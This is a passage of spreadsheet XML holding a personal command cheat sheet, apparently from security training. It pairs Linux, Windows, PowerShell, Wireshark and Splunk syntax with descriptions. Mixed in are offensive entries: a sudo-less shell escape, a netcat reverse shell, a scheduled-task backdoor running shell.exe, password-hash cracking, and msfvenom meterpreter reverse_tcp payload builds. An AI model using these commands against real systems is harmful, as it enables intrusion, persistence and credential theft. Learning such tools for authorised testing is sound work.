    <t>Reverts the User back to their defualt group only</t>
  </si>
  <si>
    <t>sudo usermod -G USERNAME</t>
  </si>
  <si>
    <t>sudo usermod -G Jack</t>
  </si>
  <si>
    <t>Renaming user via sudo</t>
  </si>
  <si>
    <t>sudo usermod -l OLDUSERNAME NEWUSERNAME</t>
  </si>
  <si>
    <t>sudo usermod -l Mike Alex</t>
  </si>
  <si>
    <t>Lock account</t>
  </si>
  <si>
    <t>sudo usermod -L USERNAME</t>
  </si>
  <si>
    <t>sudo usermod -L Mike</t>
  </si>
  <si>
    <t>-L = Lock account</t>
  </si>
  <si>
    <t>List all running services using system control</t>
  </si>
  <si>
    <t>systemctl -t service --all</t>
  </si>
  <si>
    <t>Check if cron is running command</t>
  </si>
  <si>
    <t>systemctl status cron</t>
  </si>
  <si>
    <t>Previews bottom number of lines</t>
  </si>
  <si>
    <t>tail -10 FILENAME</t>
  </si>
  <si>
    <t>tail -n 10 example.txt</t>
  </si>
  <si>
    <t xml:space="preserve">Lists content in tar file </t>
  </si>
  <si>
    <t>tar tvvf FILENAME.tar | less</t>
  </si>
  <si>
    <t>tar tvvf 20190505.tar | less</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>t:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> lists the contents of an archive,  </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>less</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t>: pipes the output of the command in pages to the terminal screen. The command displays the file permissions, size, and date/time information.</t>
    </r>
  </si>
  <si>
    <t>Extracts content from archive</t>
  </si>
  <si>
    <t>tar xvvf FILENAME.tar -C restored_emails --wildcards "*.csv"</t>
  </si>
  <si>
    <t>tar xvvf 10May2019-235536-0700.tar -C restored_emails --wildcards "*.csv"</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>x</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> = extracts and writes the files to disk. , </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>vv</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> =displays the full file specifications., </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>f</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> = filename,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> -C</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> restore to directory, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>--wildcards</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> "*.csv": only extracts the files with the extension .csv.</t>
    </r>
  </si>
  <si>
    <t>Telnet connect syntax over port</t>
  </si>
  <si>
    <t>telnet SERVERIP PORTNUMBER</t>
  </si>
  <si>
    <t>telnet 192.168.78.115 80</t>
  </si>
  <si>
    <t>Brings up all running processes on  a system</t>
  </si>
  <si>
    <t>top</t>
  </si>
  <si>
    <t>q = quit</t>
  </si>
  <si>
    <t>Bypass  into root priviledges using bash and sudo less</t>
  </si>
  <si>
    <t>touch /home/john/my_file
sudo less /home/john/myfile
in file: !bash</t>
  </si>
  <si>
    <t>&amp;&amp; argument to continue commands only if previous runs succesfully.</t>
  </si>
  <si>
    <t>touch FILENAME &amp;&amp; mkdir DIRNAME</t>
  </si>
  <si>
    <t>Create a empty file</t>
  </si>
  <si>
    <t>touch FILENAME.ext</t>
  </si>
  <si>
    <t>touch example</t>
  </si>
  <si>
    <t>Create a script file</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">touch </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>FILENAME.sh</t>
    </r>
  </si>
  <si>
    <t>touch example.sh</t>
  </si>
  <si>
    <t>unalias syntax</t>
  </si>
  <si>
    <t>unalias ALIASNAME</t>
  </si>
  <si>
    <t>unalias lh</t>
  </si>
  <si>
    <t>Shows local machine OS</t>
  </si>
  <si>
    <t>uname -a IPADDRESS</t>
  </si>
  <si>
    <t xml:space="preserve">Creates variable for string </t>
  </si>
  <si>
    <t>VARIABLE=(V0 V1 V2 V3 V4)</t>
  </si>
  <si>
    <t>mylist=(a b c d e)</t>
  </si>
  <si>
    <t>Edits the sudoers file</t>
  </si>
  <si>
    <t>visudo</t>
  </si>
  <si>
    <t>Showing file line by line</t>
  </si>
  <si>
    <t>Word Count command</t>
  </si>
  <si>
    <t>wc</t>
  </si>
  <si>
    <t>wc example.txt</t>
  </si>
  <si>
    <t>Word Count (Words Only) command</t>
  </si>
  <si>
    <t>wc - w FILENAME</t>
  </si>
  <si>
    <t>wc -w example.txt</t>
  </si>
  <si>
    <t>Word Count (Lines Only) command</t>
  </si>
  <si>
    <t>wc -l FILENAME</t>
  </si>
  <si>
    <t>wc -l example.txt</t>
  </si>
  <si>
    <t>Prints to file by wordcount and wildcard</t>
  </si>
  <si>
    <t>wc -w * &gt; FILENAME</t>
  </si>
  <si>
    <t>wc -w * &gt; example.txt</t>
  </si>
  <si>
    <t>Wildcard for specific file or text</t>
  </si>
  <si>
    <t>wc -w *Ex*</t>
  </si>
  <si>
    <t>Wildcard based on 'Ex' filename</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <color rgb="FFFEF8E3"/>
      </rPr>
      <t xml:space="preserve">Install </t>
    </r>
    <r>
      <rPr>
        <b/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>wildpwn.py</t>
    </r>
    <r>
      <rPr>
        <b/>
        <color rgb="FFFEF8E3"/>
      </rPr>
      <t xml:space="preserve"> exploit into directory</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">wget </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://raw.githubusercontent.com/localh0t/wildpwn/master/wildpwn.py</t>
    </r>
  </si>
  <si>
    <t>searches for string items belowing to variable</t>
  </si>
  <si>
    <t>which $VARIABLE</t>
  </si>
  <si>
    <t>Reveals the currently signed-in user</t>
  </si>
  <si>
    <t>whoami</t>
  </si>
  <si>
    <t>Generates new ssh key (Public Key)</t>
  </si>
  <si>
    <t>ssh-keygen</t>
  </si>
  <si>
    <t>ping webserver in ansible</t>
  </si>
  <si>
    <t>ansible webservers -m ping</t>
  </si>
  <si>
    <t>-m = module , ping is module</t>
  </si>
  <si>
    <t>Shows all docker container lists</t>
  </si>
  <si>
    <t>sudo docker container list -a</t>
  </si>
  <si>
    <t>Shows docker status</t>
  </si>
  <si>
    <t>sudo docker ps</t>
  </si>
  <si>
    <t>Start Docker Container Syntax</t>
  </si>
  <si>
    <t>sudo docker start CONTAINERNAME</t>
  </si>
  <si>
    <t>sudo docker start sad_boyd</t>
  </si>
  <si>
    <t>Stop Docker Container Syntax</t>
  </si>
  <si>
    <t>sudo docker stop CONTAINERNAME</t>
  </si>
  <si>
    <t>sudo docker stop sad_boyd</t>
  </si>
  <si>
    <t>Connect to Docker Container Syntax</t>
  </si>
  <si>
    <t>sudo docker attach CONTAINERNAME</t>
  </si>
  <si>
    <t>sudo docker attach sad_boyd</t>
  </si>
  <si>
    <t>Ansible config and hosts location</t>
  </si>
  <si>
    <t>cd /etc/ansible</t>
  </si>
  <si>
    <t>Initiates playbook script for commencing</t>
  </si>
  <si>
    <t>ansible-playbook pentest.yml</t>
  </si>
  <si>
    <t>Curls setup.php file on local machine</t>
  </si>
  <si>
    <t>curl localhost/setup.php</t>
  </si>
  <si>
    <t>Stops all docker containers running</t>
  </si>
  <si>
    <t>sudo docker stop $(docker ps -a -q)</t>
  </si>
  <si>
    <t>docker connects to dvwa container of the Replicants webpage</t>
  </si>
  <si>
    <t>docker exec -it dvwa bash</t>
  </si>
  <si>
    <t>Make user have admin access</t>
  </si>
  <si>
    <t>sudo usermod -aG admin USERNAME</t>
  </si>
  <si>
    <t>sudo usermod -aG admin systemd-ssh</t>
  </si>
  <si>
    <t xml:space="preserve">John  the ripper sy natax to bruteforce </t>
  </si>
  <si>
    <t>john --format=mscash2 FILENAME</t>
  </si>
  <si>
    <t>john --format=mscash2 hashes.txt</t>
  </si>
  <si>
    <t>sqlitebrowser FILENAME</t>
  </si>
  <si>
    <t>sqlitebrowser call_history.db</t>
  </si>
  <si>
    <t>sqlitebrowser -R -t call FILENAME</t>
  </si>
  <si>
    <t>sqlitebrowser -R -t call call_history.db</t>
  </si>
  <si>
    <t>opens reon-ng application</t>
  </si>
  <si>
    <t>recon-ng</t>
  </si>
  <si>
    <t>Recon-ng syntax to Displays all Modules</t>
  </si>
  <si>
    <t>modules search</t>
  </si>
  <si>
    <t>Recon-ng syntax to Load Module</t>
  </si>
  <si>
    <t>modules load MODULEDIR/MODULENAME</t>
  </si>
  <si>
    <t>modules load recon/hosts-ports/shodan_ip</t>
  </si>
  <si>
    <t>display information on module</t>
  </si>
  <si>
    <t>info</t>
  </si>
  <si>
    <t>Recon-ng syntax to Set source domain for selected module</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">options set SOURCE </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>Sans.org</t>
    </r>
  </si>
  <si>
    <t>Add key into module</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">keys add shodan_api </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>KEYFROMSHODAN.IO</t>
    </r>
  </si>
  <si>
    <t>Open file using cli</t>
  </si>
  <si>
    <t>xdg-open /DIR/FILENAME</t>
  </si>
  <si>
    <t>xdg-open /root/.recon-ng/workspaces/default/results.html</t>
  </si>
  <si>
    <t>Opens ZenMap (nmaps GUI)</t>
  </si>
  <si>
    <t>zenmap</t>
  </si>
  <si>
    <t>Shows all IP based info</t>
  </si>
  <si>
    <t>ip addr</t>
  </si>
  <si>
    <t>Previews help menu for searchsploit</t>
  </si>
  <si>
    <t>searchsploit -h</t>
  </si>
  <si>
    <t>-h = help menu</t>
  </si>
  <si>
    <t>searchsploit KEYWORD</t>
  </si>
  <si>
    <t>searchsploit ftp remote file</t>
  </si>
  <si>
    <t>example looking for 3 different terms. eg, ftp, remote, file</t>
  </si>
  <si>
    <t>searchsploit -t KEYTITLE</t>
  </si>
  <si>
    <t>searchsploit -t oracle</t>
  </si>
  <si>
    <t>-t = title</t>
  </si>
  <si>
    <t>searchsploit -p PORTNUMBER</t>
  </si>
  <si>
    <t>searchsploit -p 21</t>
  </si>
  <si>
    <t>searchsploit KEYWORD --exclude="KEYTERM"</t>
  </si>
  <si>
    <t>searchsploit linux kernel 4.4 --exclude="(PoC)|/DCCP/"</t>
  </si>
  <si>
    <t>--exclude= exclude fields with KEYTERM</t>
  </si>
  <si>
    <t>Prints wordcount of command results</t>
  </si>
  <si>
    <t>searchsploit KEYWORD --exclude="KEYTERM" | wc -l</t>
  </si>
  <si>
    <t>searchsploit linux kernel 4.4 --exclude="(PoC)|/DCCP/" | wc -l</t>
  </si>
  <si>
    <t>run exploit script syntax</t>
  </si>
  <si>
    <t>python DIR/FILENAME.py payload=bind rhost=REMOTEHOSTIP rport=REMOTEPORT pages=/cgi-bin/status</t>
  </si>
  <si>
    <t>python exploits/windows/remote/43993.py payload=bind rhost=172.168.0.10 rport=1234 pages=/cgi-bin/status</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>python</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">: Command required to run Python scripts
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>exploits/windows/remote/43993.py</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">: Name of the Python exploit script
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>payload=bind</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">: The payload setting.
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>rhost</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">=172.168.0.10: IP address of the remote host
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>rport</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">=1234: Port number of the remote host
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>pages</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t>=/cgi-bin/status: The specific page that you are trying to attack</t>
    </r>
  </si>
  <si>
    <t>reverse shell syntax to use Netcat to listen on port</t>
  </si>
  <si>
    <t>nc -lvp PORTNUMBER</t>
  </si>
  <si>
    <t>nc -lvp 4445</t>
  </si>
  <si>
    <t>l (listen), v (verbose), p (port)</t>
  </si>
  <si>
    <t xml:space="preserve">reverse shell syntax to use Netcat </t>
  </si>
  <si>
    <t>nc LOCALMACHINEIP PORTNUMBER -e /bin/bash</t>
  </si>
  <si>
    <t>nc 127.0.0.1 4445 -e /bin/bash</t>
  </si>
  <si>
    <t>Scan open ports and services on remote machine via nmap</t>
  </si>
  <si>
    <t>nmap -sV RHOSTIP</t>
  </si>
  <si>
    <t>nmap -sV 172.22117.150</t>
  </si>
  <si>
    <t>Shows compatible payloads</t>
  </si>
  <si>
    <t>show payloads</t>
  </si>
  <si>
    <t>nmap -p0- -v -A -T4 IPADDRESS</t>
  </si>
  <si>
    <t>nmap -p0- -v -A -T4 172.22.117.0/24</t>
  </si>
  <si>
    <t xml:space="preserve">-T4 = Noise, </t>
  </si>
  <si>
    <t>MS-DOS command to users currently logged in on machine</t>
  </si>
  <si>
    <t>set COMMAND query user</t>
  </si>
  <si>
    <t>MS-DOS command to check shares available on the machine</t>
  </si>
  <si>
    <t>set COMMAND net share</t>
  </si>
  <si>
    <t>Navigate to 64-bit directory in c: drive</t>
  </si>
  <si>
    <t>cd %ProgramFiles%</t>
  </si>
  <si>
    <t>Navigate to user $HOME directory in c: drive</t>
  </si>
  <si>
    <t>cd %USERPROFILE%\Desktop</t>
  </si>
  <si>
    <t>list contents of directory</t>
  </si>
  <si>
    <t>dir DIRNAME</t>
  </si>
  <si>
    <t>Make Directory</t>
  </si>
  <si>
    <t>md or mkdir DIRNAME</t>
  </si>
  <si>
    <t xml:space="preserve">copy file </t>
  </si>
  <si>
    <t>cp FILENAME</t>
  </si>
  <si>
    <t>delete files or directories</t>
  </si>
  <si>
    <t>del or erase FILENAME</t>
  </si>
  <si>
    <t>Cut and Paste Files (move)</t>
  </si>
  <si>
    <t xml:space="preserve">move FILENAME </t>
  </si>
  <si>
    <t>Remove directory if empty</t>
  </si>
  <si>
    <t>rd or rmdir</t>
  </si>
  <si>
    <t>Close CMD</t>
  </si>
  <si>
    <t>exit</t>
  </si>
  <si>
    <t>Show Contents of file (like cat)</t>
  </si>
  <si>
    <t>type FILENAME</t>
  </si>
  <si>
    <t>Clears screen</t>
  </si>
  <si>
    <t>cls</t>
  </si>
  <si>
    <t xml:space="preserve">Lists contents of ProgramFile Directory </t>
  </si>
  <si>
    <t>dir "%ProgramFiles(x86)%"</t>
  </si>
  <si>
    <t>Get OS values</t>
  </si>
  <si>
    <t>wmic os get /value</t>
  </si>
  <si>
    <t xml:space="preserve">Get OS Buildnumber </t>
  </si>
  <si>
    <t>wmic os get caption, buildnumber</t>
  </si>
  <si>
    <t>Appends to report.txt containiing results from os values and caption</t>
  </si>
  <si>
    <t>wmic /APPEND:report.txt os get caption</t>
  </si>
  <si>
    <t>Pulls all users on machine</t>
  </si>
  <si>
    <t>net user</t>
  </si>
  <si>
    <t>Shows specific User information Policies</t>
  </si>
  <si>
    <t>net user USERNAME</t>
  </si>
  <si>
    <t>Pulls all group accounts on local machine</t>
  </si>
  <si>
    <t>net localgroup</t>
  </si>
  <si>
    <t>Shows specific Group information Policies</t>
  </si>
  <si>
    <t>net localgroup GROUPNAME</t>
  </si>
  <si>
    <t>Pulls all account policies</t>
  </si>
  <si>
    <t>net accounts</t>
  </si>
  <si>
    <t xml:space="preserve">Creates user  </t>
  </si>
  <si>
    <t>net user USER PASSWORD /add</t>
  </si>
  <si>
    <t>net user Barbara Coldcalls123! /add</t>
  </si>
  <si>
    <t>Setting a new password for user</t>
  </si>
  <si>
    <t>net user USERNAME NEWPASS</t>
  </si>
  <si>
    <t>net localgroup GROUPNAME USERNAME /add</t>
  </si>
  <si>
    <t>Shut Down Computer</t>
  </si>
  <si>
    <t>stop-Computer -confirm</t>
  </si>
  <si>
    <t>Force Shut Down Computer</t>
  </si>
  <si>
    <t>stop-Computer -force</t>
  </si>
  <si>
    <t>Navigate to directory</t>
  </si>
  <si>
    <t>Set-Location or cd</t>
  </si>
  <si>
    <t>List Resources in Directory</t>
  </si>
  <si>
    <t>Get-Children or ls, dir</t>
  </si>
  <si>
    <t>Create new item</t>
  </si>
  <si>
    <t>New-Item or mkdir, touch</t>
  </si>
  <si>
    <t>Create new item in directory</t>
  </si>
  <si>
    <t>New-Item -Path "c:\" -Name "Logs" -ItemType "Directory"</t>
  </si>
  <si>
    <t>Delete Item</t>
  </si>
  <si>
    <t>Remove-Item or rm, rmdir</t>
  </si>
  <si>
    <t>Print Working Directory</t>
  </si>
  <si>
    <t>Get-Location or pwd</t>
  </si>
  <si>
    <t>Shows output</t>
  </si>
  <si>
    <t>Get-Content or cat, type</t>
  </si>
  <si>
    <t>copy's item</t>
  </si>
  <si>
    <t>Copy-Item or cp</t>
  </si>
  <si>
    <t>moves item</t>
  </si>
  <si>
    <t>Move-Item or mv</t>
  </si>
  <si>
    <t>Write-Output or echo</t>
  </si>
  <si>
    <t>Get-Alias or Alias</t>
  </si>
  <si>
    <t>Get-Help or man</t>
  </si>
  <si>
    <t>Get-Process or ps</t>
  </si>
  <si>
    <t>Stop-Process or kill</t>
  </si>
  <si>
    <t>Get-Service or service --status-all</t>
  </si>
  <si>
    <t>Searches for all commands with 'Process'</t>
  </si>
  <si>
    <t>Get-Command -Name *process</t>
  </si>
  <si>
    <t>Start-Process -FilePath CMD -Verb RunAs</t>
  </si>
  <si>
    <t>Stop the process based on its name</t>
  </si>
  <si>
    <t>Stop-Process -Name PROCESSNAME</t>
  </si>
  <si>
    <t>Searches for all lognames in Windows Events  for 'system'</t>
  </si>
  <si>
    <t>Get-WinEvent -LogName *system</t>
  </si>
  <si>
    <t xml:space="preserve">Shows max events 40 </t>
  </si>
  <si>
    <t>Get-WinEvent -LogName System -MaxEvents 10</t>
  </si>
  <si>
    <t>Get-WinEvent -ListLog *</t>
  </si>
  <si>
    <t>Displays 10 top winevents with system , converts to json, then redirects results to directory and rename</t>
  </si>
  <si>
    <t>Get-WinEvent -LogName System -MaxEvents 10 | ConvertTo-Json | Out-File -FilePath C:\Logs\RecentSystemLogs.json</t>
  </si>
  <si>
    <t>Edit Powershell script via bitbash</t>
  </si>
  <si>
    <t>nano SCRIPTNAME.ps1</t>
  </si>
  <si>
    <t>run script command in powershell</t>
  </si>
  <si>
    <t>.\SCRIPTNAME.ps1</t>
  </si>
  <si>
    <t>Sets variable and displays package info</t>
  </si>
  <si>
    <t>$packagename="Skype";
choco info $packagename</t>
  </si>
  <si>
    <t>Uninstalls package and approves all requests</t>
  </si>
  <si>
    <t>$packagename="Skype";
choco uninstall -y $packagename</t>
  </si>
  <si>
    <t>ps1 script to output name of package by line</t>
  </si>
  <si>
    <t>$csv = Import-Csv -Path c:\Users\azadmin\Documents\Demo\choco\chocodemo.csv
foreach ($line in $csv) {
    Write-Output $line.name
}</t>
  </si>
  <si>
    <t>ps1 script to uninstall name of package by line</t>
  </si>
  <si>
    <t>$csv = Import-Csv -Path .\chocodemo.csv
foreach ($line in $csv) {
    choco uninstall -y $line.name
}</t>
  </si>
  <si>
    <t>forces group policy update</t>
  </si>
  <si>
    <t>gpupdate /force</t>
  </si>
  <si>
    <t>PING</t>
  </si>
  <si>
    <t>ping -n 4 DOMAINNAME</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">ping -n 4 </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>google.com</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Traceroute syntax </t>
  </si>
  <si>
    <t>tracert DOMAINNAME</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">tracert </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>google.com</t>
    </r>
  </si>
  <si>
    <t>Lookup dns information</t>
  </si>
  <si>
    <t>nslookup google.com</t>
  </si>
  <si>
    <t>see open ports on a machine</t>
  </si>
  <si>
    <t>nmap -sS IPADDRESS</t>
  </si>
  <si>
    <t>sudo nmap -sS 161.35.96.20</t>
  </si>
  <si>
    <t>see the running processes of a remote machine</t>
  </si>
  <si>
    <t>Get-WmiObject Win32_Service -ComputerName WINDC01</t>
  </si>
  <si>
    <t>shows the privileges of the currently signed in user</t>
  </si>
  <si>
    <t>whoami /priv</t>
  </si>
  <si>
    <t xml:space="preserve">Create a scheduled task that will execute your payload every day at midnight.
</t>
  </si>
  <si>
    <t>schtasks /create /f /tn Backdoor /SC ONCE /ST 00:00 /TR "C:\PAYLOAD"</t>
  </si>
  <si>
    <t>schtasks /create /f /tn Backdoor /SC ONCE /ST 00:00 /TR "C:\shell.exe"</t>
  </si>
  <si>
    <t>schtasks /run /tn Backdoor</t>
  </si>
  <si>
    <t>show lists of all scheduled tasks on machine</t>
  </si>
  <si>
    <t>schtasks /query /fo LIST</t>
  </si>
  <si>
    <t>shows all users on mahine</t>
  </si>
  <si>
    <t>net users</t>
  </si>
  <si>
    <t>Filters for only DHCP protocols</t>
  </si>
  <si>
    <t>dhcp</t>
  </si>
  <si>
    <t xml:space="preserve">Filters for DHCP queries by their step </t>
  </si>
  <si>
    <t>dhcp.option.dhcp == STEPNUMBER</t>
  </si>
  <si>
    <t>dhcp.option.dhcp == 3</t>
  </si>
  <si>
    <t>Filter by time stamp</t>
  </si>
  <si>
    <t>frame.time &gt;= "June 02, 2019 18:00:00"</t>
  </si>
  <si>
    <t>Filter by URL</t>
  </si>
  <si>
    <t>http.host == "HOSTNAME"</t>
  </si>
  <si>
    <t>Filter by IP Address</t>
  </si>
  <si>
    <t>ip.addr == IPADDRESS</t>
  </si>
  <si>
    <t>ip.addr == 192.168.2.1</t>
  </si>
  <si>
    <t>Filter by multiple IP Address</t>
  </si>
  <si>
    <t>ip.addr == IPADDRESS and ip.addr == IPADDRESS</t>
  </si>
  <si>
    <t>ip.addr == 192.168.2.1 and ip.addr == 192.168.2.255</t>
  </si>
  <si>
    <t>Filter Subnet</t>
  </si>
  <si>
    <t>ip.addr == IPADDRESS/SUBNET</t>
  </si>
  <si>
    <t>ip.addr == 192.168.2.1/24</t>
  </si>
  <si>
    <t>Filter by IP Address Range</t>
  </si>
  <si>
    <t>ip.addr &gt;= IPADDRESS and ip.addr &lt;= IPADDRESS</t>
  </si>
  <si>
    <t>ip.addr &gt;= 192.168.2.1 and ip.addr &lt;= 192.168.2.1</t>
  </si>
  <si>
    <t>Filter by destination IP Address</t>
  </si>
  <si>
    <t>ip.dest == IPADDRESS</t>
  </si>
  <si>
    <t>ip.dest == 192.168.2.3</t>
  </si>
  <si>
    <t>Filter by Source IP Address</t>
  </si>
  <si>
    <t>ip.src == IPADDRESS</t>
  </si>
  <si>
    <t>ip.Source == 192.168.2.5</t>
  </si>
  <si>
    <t>Filter by Destination Port</t>
  </si>
  <si>
    <t>tcp.dstport == PORTNUMBER</t>
  </si>
  <si>
    <t>tcp.dstport == 23</t>
  </si>
  <si>
    <t>TCP FIN filter for tcp handshake</t>
  </si>
  <si>
    <t>TCP SYN filter for tcp handshake</t>
  </si>
  <si>
    <t>Filter by Port</t>
  </si>
  <si>
    <t>tcp.port == PORTNUMBER</t>
  </si>
  <si>
    <t>tcp.port == 25</t>
  </si>
  <si>
    <t>Filter by IP Address and Port</t>
  </si>
  <si>
    <t>tcp.port == PORTNUMBER and tcp.port == PORTNUMBER</t>
  </si>
  <si>
    <t>tcp.port == 192.168.2.1 and tcp.port == 25</t>
  </si>
  <si>
    <t>Outputs the city and country data of a source IP field</t>
  </si>
  <si>
    <t>sourcetype="stream:http" | iplocation src_ip</t>
  </si>
  <si>
    <t>Outputs the city and country data of a dest IP field</t>
  </si>
  <si>
    <t>sourcetype="stream:http" | iplocation dest_ip</t>
  </si>
  <si>
    <t>Outputs location data found with the iplocation command to map latitude and longitude data for each event.</t>
  </si>
  <si>
    <t>sourcetype="stream:http" | iplocation src_ip | geostats count</t>
  </si>
  <si>
    <t xml:space="preserve">source="radialgauge.csv" http_method=POST | 
</t>
  </si>
  <si>
    <t>Launches MSFconsole from the command line.</t>
  </si>
  <si>
    <t>msfconsole</t>
  </si>
  <si>
    <t>Displays all the available modules.</t>
  </si>
  <si>
    <t>Show MODULETYPE</t>
  </si>
  <si>
    <t>show auxiliary</t>
  </si>
  <si>
    <t>Searches for modules based on a keyword.</t>
  </si>
  <si>
    <t>Search KEYWORD</t>
  </si>
  <si>
    <t>Search ftp</t>
  </si>
  <si>
    <t>Selects a specific module.</t>
  </si>
  <si>
    <t>Use MODULENAME</t>
  </si>
  <si>
    <t>use scanner/ftp/anonymous</t>
  </si>
  <si>
    <t>Displays the module details as well as the required and optional options.</t>
  </si>
  <si>
    <t>Displays the options available for the module.</t>
  </si>
  <si>
    <t>options</t>
  </si>
  <si>
    <t>has to be in module to run.</t>
  </si>
  <si>
    <t>Runs the module.</t>
  </si>
  <si>
    <t>exploit OR run</t>
  </si>
  <si>
    <t>Set target remote host based on IP address.</t>
  </si>
  <si>
    <t>set RHOSTS HOSTIP</t>
  </si>
  <si>
    <t>set RHOSTS 172.22.117.150</t>
  </si>
  <si>
    <t>opens msfvenom options panel</t>
  </si>
  <si>
    <t>msfvenom</t>
  </si>
  <si>
    <t>Metasploit payload we want to use</t>
  </si>
  <si>
    <t>msfvenom -p</t>
  </si>
  <si>
    <t>Encoder we want to use</t>
  </si>
  <si>
    <t>msfvenom -e</t>
  </si>
  <si>
    <t>Architecture we want to use (the default is x86)</t>
  </si>
  <si>
    <t>msfvenom -a</t>
  </si>
  <si>
    <t>Maximum size of the payload</t>
  </si>
  <si>
    <t>msfvenom -s</t>
  </si>
  <si>
    <t>Number of iterations with which to encode the payload</t>
  </si>
  <si>
    <t>msfvenom -i</t>
  </si>
  <si>
    <t>Custom executable file to use as a template</t>
  </si>
  <si>
    <t>msfvenom -x</t>
  </si>
  <si>
    <t>Output file to be created, specifying its name and location</t>
  </si>
  <si>
    <t>msfvenom -o</t>
  </si>
  <si>
    <t>msfvenom Command Syntax</t>
  </si>
  <si>
    <t>msfvenom -p COMMANDMODULE -a x86 -e ENCODER -f FILETYPE -o OUTPUTFILENAME LHOST=LIPADDRESS LPORT=LIPPORTNUM</t>
  </si>
  <si>
    <t>msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe -o /tmp/hack.exe LHOST=192.168.0.8 LPORT=4444</t>
  </si>
  <si>
    <t>Lists all msfvenom payloads</t>
  </si>
  <si>
    <t>msfvenom -l payloads</t>
  </si>
  <si>
    <t>Lists all msfvenom file formats</t>
  </si>
  <si>
    <t>msfvenom -l formats</t>
  </si>
  <si>
    <t>msfvenom -p COMMANDMODULE LHOST=LIPADDRESS LPORT=LPORTNUM -f exe R &gt; OUTPUTFILE</t>
  </si>
  <si>
    <t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.8 LPORT=4444 -f exe R &gt; hack.exe</t>
  </si>
  <si>
    <t>msfvenom -p COMMANDMODULE LHOST=LIPADDRESS LPORT=LPORTNUM -f exe &gt; OUTPUTFILE</t>
  </si>
  <si>
